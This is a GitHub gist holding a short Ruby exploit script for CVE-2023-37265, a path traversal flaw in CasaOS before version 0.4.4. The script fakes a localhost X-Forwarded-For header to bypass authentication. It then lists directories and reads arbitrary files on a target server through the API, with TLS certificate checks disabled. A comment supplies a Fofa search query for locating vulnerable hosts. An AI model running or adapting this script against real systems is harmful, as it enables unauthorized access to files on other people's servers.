Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Created August 13, 2023 13:16
Show Gist options
  • Save komodoooo/1727bdf564a94df60e756bafa4e449b5 to your computer and use it in GitHub Desktop.
Save komodoooo/1727bdf564a94df60e756bafa4e449b5 to your computer and use it in GitHub Desktop.
CVE-2023-37265 exploit via XFF bypass
require 'http'
require 'openssl'
require 'json'
puts """
CVE-2023-37265
CasaOS <0.4.4 Path traversal Exploit
By komodo
"""
=begin
Fofa query to search vulnerable targets:
body="/CasaOS-UI/public/index.html"
=end
def main(url, path)
url.delete_suffix!("/") unless url[-1..-1] != "/"
@ctx = OpenSSL::SSL::SSLContext.new()
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
headerz={"X-Forwarded-For"=>"127.0.0.1"}
r=HTTP.get("#{url}/v1/folder?path=#{path}",
:headers=>headerz, :ssl_context=>@ctx)
r2=HTTP.get("#{url}/v1/file?path=#{path}",
:headers=>headerz,:ssl_context=>@ctx).body
d=JSON.load(r.body)['data']['content']
if r.code==200 and r.body.to_s[0]=="{"
puts "\n"
d.size.times do |i|
puts d[i]['path']
end
elsif r.code==500 and r.body.to_s.include?("not a directory")
puts r2
else raise
end
end
begin
print"\nBase URL: "
t=gets.chomp
while true
print "\nPath> ";p=gets.chomp
main(t,p.empty?? "/":p)
end
rescue => e
puts "\nNot vulnerable!"
abort(e.to_s)
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment